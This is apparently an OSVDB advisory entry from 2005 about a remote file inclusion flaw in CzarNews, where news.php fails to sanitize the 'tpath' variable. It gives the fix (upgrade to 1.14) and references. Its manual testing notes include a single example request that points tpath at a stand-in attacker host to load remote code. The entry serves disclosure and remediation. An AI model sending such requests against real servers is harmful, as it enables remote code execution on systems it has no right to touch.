CzarNews news.php tpath Variable Remote File Inclusion

2005-03-18T09:53:44
ID OSVDB:14926
Type osvdb
Reporter Frank 'brOmstar'Reißner(mail@frank-reissner.de)
Modified 2005-03-18T09:53:44

Description

Vulnerability Description

CzarNews contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to news.php not properly sanitizing user input supplied to the 'tpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Upgrade to version 1.14 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

CzarNews contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to news.php not properly sanitizing user input supplied to the 'tpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[victim]/research/news/CzarNewsv113b/news.php?tpath=http://[attacker]/

References:

Vendor URL: http://www.czaries.net/scripts/ Security Tracker: 1013486 Secunia Advisory ID:14670 Related OSVDB ID: 14925 Other Advisory URL: http://www.root-security.org/danger/CzarNews.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0242.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0267.html Generic Exploit URL: http://milw0rm.com/exploits/2009